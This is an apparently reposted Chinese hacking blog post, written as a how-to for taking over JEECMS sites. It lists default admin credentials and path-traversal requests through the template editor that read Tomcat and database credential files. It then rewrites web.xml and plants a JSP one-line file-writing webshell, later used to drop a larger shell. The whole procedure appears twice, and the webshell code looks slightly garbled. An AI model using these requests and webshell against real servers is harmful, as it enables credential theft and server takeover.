JEECMS编辑漏洞及随便拿webshell,啊哈哈
2013-12-10 22:47
951 查看
JEECMS是基于java技术开发,继承其强大、稳定、安全、高效、跨平台等多方面的优点 · 采用SpringMVC3+Spring3+Hibernate3+Freemarker主流技术架构 安全性做得非常变态,当网站安装完成后就不再允许执行任何目录下的jsp文件了(web.xml配置了过滤器禁止了很多种动态脚本)。
2.x后台:
login/Jeecms.do
3.x后台:
jeeadmin/jeecms/index.do默认账户:admin
默认密码:password获取tomcat密码:
/jeeadmin/jeecms/template/v_edit.do?root=../../conf/&name=../../conf/tomcat-users.xml
获取JDBC数据库账号密码:
/jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2Fconfig%2F&name=%2FWEB-INF%2Fconfig%2Fjdbc.properties
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/05/c9b7ed0bb6e52c54a50063fe29d079e8.jpg)
JEECMS2.x版读取路径:
admin/core/template/Com_edit.do?relPath=\../../../classes/jdbc.properties
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/05/1aebd7e480ed2879b715b053fcf0b855.jpg)
修改web.xml取消对jsp的过滤:
/jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2F&name=%2FWEB-INF%2Fweb.xml
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/05/a8e8ae75b111fe170cb0964ed7c96f6a.jpg)
JEECMS2.x版读取路径:
admin/core/template/Com_edit.do?relPath=\../../../web.xml
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/05/add5d465e146b65d4543d111f1bb0028.jpg)
修改install/install_setup.jsp:
/jeeadmin/jeecms/template/v_edit.do?root=%2Finstall%2F&name=%2Finstall%2Finstall_setup.jsp
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/05/d6f6384b79a6e683254430cf1dccfafd.jpg)
JEECMS2.x版读取路径:
admin/core/template/Com_edit.do?relPath=\../../../../install\install_setup.jsp
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/05/36dd6c5f4721658a0b22091688e8ee7d.jpg)
插入Jsp一句话:
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("("f"))).write(request.getParameter("t").getBytes());
%>修改后的一句话目录
/install/install_setup.jsp一句话连接成功后的jsp大马目录:
/ma.jsp
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/05/7742c682675a597c8fedf8a8718a1858.jpg)
注:1:2.X 在后台可以上传媒体格式为jsp的文件2:web.xml修改后需要重启服务器(自动加载更新的除外)
3:本文由 李听Hack 原创,转载请留名。
2.x后台:
login/Jeecms.do
3.x后台:
jeeadmin/jeecms/index.do默认账户:admin
默认密码:password获取tomcat密码:
/jeeadmin/jeecms/template/v_edit.do?root=../../conf/&name=../../conf/tomcat-users.xml
获取JDBC数据库账号密码:
/jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2Fconfig%2F&name=%2FWEB-INF%2Fconfig%2Fjdbc.properties
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/05/c9b7ed0bb6e52c54a50063fe29d079e8.jpg)
JEECMS2.x版读取路径:
admin/core/template/Com_edit.do?relPath=\../../../classes/jdbc.properties
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/05/1aebd7e480ed2879b715b053fcf0b855.jpg)
修改web.xml取消对jsp的过滤:
/jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2F&name=%2FWEB-INF%2Fweb.xml
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/05/a8e8ae75b111fe170cb0964ed7c96f6a.jpg)
JEECMS2.x版读取路径:
admin/core/template/Com_edit.do?relPath=\../../../web.xml
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/05/add5d465e146b65d4543d111f1bb0028.jpg)
修改install/install_setup.jsp:
/jeeadmin/jeecms/template/v_edit.do?root=%2Finstall%2F&name=%2Finstall%2Finstall_setup.jsp
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/05/d6f6384b79a6e683254430cf1dccfafd.jpg)
JEECMS2.x版读取路径:
admin/core/template/Com_edit.do?relPath=\../../../../install\install_setup.jsp
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/05/36dd6c5f4721658a0b22091688e8ee7d.jpg)
插入Jsp一句话:
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("("f"))).write(request.getParameter("t").getBytes());
%>修改后的一句话目录
/install/install_setup.jsp一句话连接成功后的jsp大马目录:
/ma.jsp
![](https://oscdn.geek-share.com/Uploads/Images/Content/201909/05/7742c682675a597c8fedf8a8718a1858.jpg)
注:1:2.X 在后台可以上传媒体格式为jsp的文件2:web.xml修改后需要重启服务器(自动加载更新的除外)
3:本文由 李听Hack 原创,转载请留名。
相关文章推荐
- JEECMS后台任意文件编辑漏洞及拿shell
- 利用动网论坛dvBBS漏洞上传webshell
- Discuz! admin unwizard.inc.php 漏洞利用(Get Webshell)
- 利用JBoss漏洞拿webshell方法
- 利用ASP上传漏洞得到webshell实战
- DZ7.1 and 7.2 0远程代码执行漏洞获取Webshell
- “脚本编辑器”远程文件编辑漏洞
- 发现21cn邮箱存在严重的安全漏洞及风险,对于申请密保的邮箱可以随便更改任意用户的密码
- 关于oblog、动易、风讯等拥有源码编辑的程序漏洞浅析
- Android 7.0 插卡后APN信息的加载流程、UI界面编辑APN的流程及Android中APN配置相关的漏洞
- 无题,李商隐,哈哈哈,随便写写
- 由webshell攻击简单谈一谈系统的某些漏洞
- phpcms v9模版编辑路径穿越漏洞
- Android 7.0 插卡后APN信息的加载流程、UI界面编辑APN的流程及Android中APN配置相关的漏洞
- 各种解析漏洞获取Webshell
- 利用JBoss漏洞拿webshell方法
- 数据库只读时的eWebEditor的上传漏洞拿webshell总结
- FH Admin框架WebShell漏洞发现
- 最新漏洞简单得WEBSHELL